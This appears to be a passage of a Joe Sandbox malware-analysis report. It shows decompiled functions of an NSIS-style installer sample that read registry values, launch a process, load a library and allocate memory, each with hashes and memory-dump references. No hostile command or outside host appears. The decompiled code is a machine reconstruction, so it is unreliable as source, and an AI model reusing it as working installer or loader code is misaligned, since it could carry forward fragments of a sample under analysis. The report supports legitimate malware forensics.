Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 03dbe0d26460962354df2622affe4a7f19e46f8d18e7fde011b494353cd470c5
Instruction ID: 5e04443d83733b215e2c60cf409d87083b19ce8acf9f2344b17a5e906d0b9b78
Opcode Fuzzy Hash: 03dbe0d26460962354df2622affe4a7f19e46f8d18e7fde011b494353cd470c5
Instruction Fuzzy Hash: E7017C31500608AFEF209F52DD81AAB3725EF95755F10407FFA00B61D0D73E9C919E69

Uniqueness

Uniqueness Score: -1.00%

Function 0040612D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040612D(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004060CC(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8); // executed
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x0040613b
0x0040613d
0x00406155
0x0040615a
0x0040615f
0x0040619d
0x0040619d
0x00406161
0x00406173
0x0040617e
0x00406184
0x0040618f
0x00000000
0x00000000
0x0040618f
0x004061a3

APIs

RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,007A0F00,00000000,?,?,Call,?,?,004063A1,80000002), ref: 00406173
RegCloseKey.ADVAPI32(?,?,004063A1,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,007A0F00), ref: 0040617E

Strings

Call, xrefs: 00406134

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction ID: 844fa4e459781eb8e351c6656b051d01f86af1f9d8b6039d3a5e8c643dc5dfc4
Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction Fuzzy Hash: E1015A72500209EAEF218F51CD0AEDB3BA8EF54360F01803AF91AA6191D778D964CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405844 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405844(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x7a4f28->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x7a4f28,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x0040584d
0x0040586d
0x00405875
0x0040587a
0x00000000
0x00405880
0x00405884

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 0040586D
CloseHandle.KERNEL32(?), ref: 0040587A

Strings

Error launching installer, xrefs: 00405857

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
Instruction ID: aeed2aac7dae16331184000a6a76f50175ec0d5b09d6907c0601aa480b830b3a
Opcode Fuzzy Hash: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
Instruction Fuzzy Hash: A0E0BFF5500209BFEB009F64ED05E7B76ACEB54645F018525BD50F2190D67999148A78

Uniqueness

Uniqueness Score: -1.00%

Function 0040202C Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E0040202C(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				void* _t34;
				WCHAR* _t37;
				intOrPtr* _t38;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x7a8af8");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x7a8ac8 =  *0x7a8ac8 +  *(_t39 - 4);
					return 0;
				}
				_t37 = E00402C37(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x3c)) = E00402C37("true");
				if( *((intOrPtr*)(_t39 - 0x18)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t37, _t32, 8); // executed
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t38 = E004066A8( *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x3c)));
					if(_t38 == _t32) {
						E004052C3(0xfffffff7,  *((intOrPtr*)(_t39 - 0x3c)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x20)) == _t32) {
							 *_t38( *((intOrPtr*)(_t39 - 8)), 0x400, _t34, 0x40cdac, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x20)));
							if( *_t38() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x1c)) == _t32 && E0040390D( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8)); // executed
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t37); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x0040202c
0x0040202c
0x00402031
0x00402038
0x004020f7
0x00402245
0x00402245
0x00402abf
0x00402ac2
0x00402ace
0x00402ace
0x00402047
0x00402051
0x00402054
0x00402064
0x00402068
0x00402070
0x00402073
0x004020f0
0x00000000
0x004020f0
0x00402075
0x00402080
0x00402084
0x004020c4
0x00402086
0x00402089
0x0040208c
0x004020b8
0x0040208e
0x00402091
0x0040209a
0x0040209c
0x0040209c
0x0040209a
0x0040208c
0x004020cc
0x004020e5
0x004020e5
0x00000000
0x004020cc
0x00402057
0x0040205f
0x00402062
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00402057

Part of subcall function 004052C3: lstrlenW.KERNEL32(007A0F00,00000000,007924D8,75ED23A0,?,?,?,?,?,?,?,?,?,0040323B,00000000,?), ref: 004052FB
Part of subcall function 004052C3: lstrlenW.KERNEL32(0040323B,007A0F00,00000000,007924D8,75ED23A0,?,?,?,?,?,?,?,?,?,0040323B,00000000), ref: 0040530B
Part of subcall function 004052C3: lstrcatW.KERNEL32(007A0F00,0040323B), ref: 0040531E
Part of subcall function 004052C3: SetWindowTextW.USER32(007A0F00,007A0F00), ref: 00405330
Part of subcall function 004052C3: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405356
Part of subcall function 004052C3: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405370
Part of subcall function 004052C3: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040537E

LoadLibraryExW.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 00402068
FreeLibrary.KERNELBASE(?,?,000000F7,?,?,?,?,00000008,?,000000F0), ref: 004020E5

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 7ec08670c164e3e4a84eae5e80db5c7481304a47723853e255a05842b85f3cdd
Instruction ID: 33d9dd4ae41202a81bff1c9b27653e69474f3e4813fbbe5d8a50aab7b73a9ae0
Opcode Fuzzy Hash: 7ec08670c164e3e4a84eae5e80db5c7481304a47723853e255a05842b85f3cdd
Instruction Fuzzy Hash: 1E21B371900208AACF20AFA5CE4CA9E7970AF05354F64813BF511B11E1DBBD4951DA5E

Uniqueness

Uniqueness Score: -1.00%

Function 00401B71 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401B71(void* __ebx) {
				intOrPtr _t8;
				void* _t9;
				void _t12;
				void* _t14;
				void* _t22;
				void* _t25;
				void* _t30;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t37;

				_t28 = __ebx;
				_t8 =  *((intOrPtr*)(_t37 - 0x20));
				_t30 =  *0x40cdac; // 0x0
				if(_t8 == __ebx) {
					if( *((intOrPtr*)(_t37 - 0x24)) == __ebx) {
						_t9 = GlobalAlloc(0x40, 0x804); // executed
						_t34 = _t9;
						_t5 = _t34 + 4; // 0x4
						E00406281(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x28)));
						_t12 =  *0x40cdac; // 0x0
						 *_t34 = _t12;
						 *0x40cdac = _t34;
					} else {
						if(_t30 == __ebx) {
							 *((intOrPtr*)(_t37 - 4)) = 1;
						} else {
							_t3 = _t30 + 4; // 0x4
							E0040625F(_t33, _t3);
							_push(_t30);
							 *0x40cdac =  *_t30;
							GlobalFree();
						}
					}
					goto L15;
				} else {
					while(1) {
						_t8 = _t8 - 1;
						if(_t30 == _t28) {
							break;
						}
						_t30 =  *_t30;
						if(_t8 != _t28) {
							continue;
						} else {
							if(_t30 == _t28) {
								break;
							} else {
								_t32 = _t30 + 4;
								_t36 = L"Call";
								E0040625F(_t36, _t30 + 4);
								_t22 =  *0x40cdac; // 0x0
								E0040625F(_t32, _t22 + 4);
								_t25 =  *0x40cdac; // 0x0
								_push(_t36);
								_push(_t25 + 4);
								E0040625F();
								L15:
								 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t37 - 4));
								_t14 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push(E00406281(_t28, _t30, _t33, _t28, 0xffffffe8));
					E004058C1();
					_t14 = 0x7fffffff;
				}
				L17:
				return _t14;
			}

0x00401b71
0x00401b71
0x00401b74
0x00401b7c
0x00401bc5
0x00401bf3
0x00401bfc
0x00401bfe
0x00401c02
0x00401c07
0x00401c0c
0x00401c0e
0x00401bc7
0x00401bc9
0x00402885
0x00401bcf
0x00401bcf
0x00401bd4
0x00401bdb
0x00401bdc
0x00401be1
0x00401be1
0x00401bc9
0x00000000
0x00401b7e
0x00401b7e
0x00401b7e
0x00401b81
0x00000000
0x00000000
0x00401b87
0x00401b8b
0x00000000
0x00401b8d
0x00401b8f
0x00000000
0x00401b95
0x00401b95
0x00401b98
0x00401b9f
0x00401ba4
0x00401bae
0x00401bb3
0x00401bb8
0x00401bbc
0x004029db
0x00402abf
0x00402ac2
0x00402ac8
0x00402ac8
0x00401b8f
0x00000000
0x00401b8b
0x004022de
0x004022eb
0x004022ec
0x004022f1
0x004022f1
0x00402aca
0x00402ace

APIs

GlobalFree.KERNEL32(00000000), ref: 00401BE1
GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF3

Strings

Call, xrefs: 00401B98, 00401B9E, 00401BB8

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: Global$AllocFree
String ID: Call
API String ID: 3394109436-1824292864
Opcode ID: 1bbcc836f2a4653b13522cd00a863f9842cd1eaa2e08dbca4416ed67f050c7c0
Instruction ID: ff4179f111cc43373cd76ec1a10ab0793b80b0baf7d628909b63b00cde6b52bc
Opcode Fuzzy Hash: 1bbcc836f2a4653b13522cd00a863f9842cd1eaa2e08dbca4416ed67f050c7c0
Instruction Fuzzy Hash: 5521AC72600100EFDB60FB94CE8895A76BAAF94328725413BF502F72D2DA7C98518F1D

Uniqueness

Uniqueness Score: -1.00%

Function 004024F2 Relevance: 4.5, APIs: 3, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004024F2(int* __ebx, intOrPtr __edx, short* __esi) {
				void* _t9;
				int _t10;
				long _t13;
				int* _t16;
				intOrPtr _t21;
				void* _t22;
				short* _t24;
				void* _t26;
				void* _t29;

				_t24 = __esi;
				_t21 = __edx;
				_t16 = __ebx;
				_t9 = E00402C77(_t29, 0x20019); // executed
				_t22 = _t9;
				_t10 = E00402C15(3);
				 *((intOrPtr*)(_t26 - 0x4c)) = _t21;
				 *__esi = __ebx;
				if(_t22 == __ebx) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				} else {
					 *(_t26 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t26 - 0x18)) == __ebx) {
						_t13 = RegEnumValueW(_t22, _t10, __esi, _t26 + 8, __ebx, __ebx, __ebx, __ebx); // executed
						__eflags = _t13;
						if(_t13 != 0) {
							 *((intOrPtr*)(_t26 - 4)) = 1;
						}
					} else {
						RegEnumKeyW(_t22, _t10, __esi, 0x3ff);
					}
					_t24[0x3ff] = _t16;
					_push(_t22); // executed
					RegCloseKey(); // executed
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}

0x004024f2
0x004024f2
0x004024f2
0x004024f7
0x004024fe
0x00402500
0x00402508
0x0040250b
0x0040250e
0x00402885
0x00402514
0x0040251c
0x0040251f
0x00402538
0x0040253e
0x00402540
0x00402542
0x00402542
0x00402521
0x00402525
0x00402525
0x00402549
0x00402550
0x00402551
0x00402551
0x00402ac2
0x00402ace

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402525
RegEnumValueW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,00020019), ref: 00402538
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nscDB19.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402551

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: 6a86e1bd43d658956a24e80c4655f94319288aa63fccf1280777c32568c96463
Instruction ID: 18a2236d2da02041d188dcbd2d72052a2a953223b30961087eade96b9ec92dd4
Opcode Fuzzy Hash: 6a86e1bd43d658956a24e80c4655f94319288aa63fccf1280777c32568c96463
Instruction Fuzzy Hash: 90017171904104AFE7159FA5DE89ABFB6B8EF45348F10403EF105A62D0DAB84E449B69

Uniqueness

Uniqueness Score: -1.00%

Function 1000289C Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(00000000), ref: 1000295B
GetLastError.KERNEL32 ref: 10002A62

Memory Dump Source

Source File: 00000006.00000002.45232552637.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.45232522122.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.45232596193.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.45232631278.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_hi38VYWujz.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
Instruction ID: 6dfa44c8e371a7ac1a486a55eff0af4ad814c9ea0d06d7514663fdd8c294557a
Opcode Fuzzy Hash: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
Instruction Fuzzy Hash: 4E51B4B9905211DFFB20DFA4DCC675937A8EB443D4F22C42AEA04E726DCE34A990CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0040247E Relevance: 3.1, APIs: 2, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040247E(int* __ebx, char* __esi) {
				void* _t17;
				short* _t18;
				long _t21;
				void* _t33;
				void* _t37;
				void* _t40;

				_t35 = __esi;
				_t27 = __ebx;
				_t17 = E00402C77(_t40, 0x20019); // executed
				_t33 = _t17;
				_t18 = E00402C37(0x33);
				 *__esi = __ebx;
				if(_t33 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x4c) = 0x800;
					_t21 = RegQueryValueExW(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x4c); // executed
					if(_t21 != 0) {
						L7:
						 *_t35 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x18) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x18) == __ebx;
							E004061A6(__esi,  *__esi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x18);
								_t35[0x7fe] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t33); // executed
					RegCloseKey(); // executed
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *(_t37 - 4);
				return 0;
			}

0x0040247e
0x0040247e
0x00402483
0x0040248a
0x0040248c
0x00402493
0x00402496
0x00402885
0x0040249c
0x0040249f
0x004024af
0x004024ba
0x004024ea
0x004024ea
0x004024ed
0x004024bc
0x004024c0
0x004024d9
0x004024e0
0x004024e3
0x004024c2
0x004024c5
0x004024d0
0x00402549
0x00000000
0x00000000
0x00000000
0x004024c5
0x004024c0
0x00402550
0x00402551
0x00402551
0x00402ac2
0x00402ace

APIs

RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024AF
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nscDB19.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402551

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: ca0df22cfa243c35f27caf0df866c2577824331e06cdaaee0dc4b8b501ce7e4d
Instruction ID: 12a56d39eb772e04bf5da2f774c5f61affeaaf74f2150d0b0e53692ad729b11e
Opcode Fuzzy Hash: ca0df22cfa243c35f27caf0df866c2577824331e06cdaaee0dc4b8b501ce7e4d
Instruction Fuzzy Hash: 0C117371914209EFEF24DFA4CA595BEB6B4EF05344F20843FE046A72C0D7B84A45DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x7a8a70;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x7a7a0c =  *0x7a7a0c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x7a7a0c, 0x7530,  *0x7a79f4), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
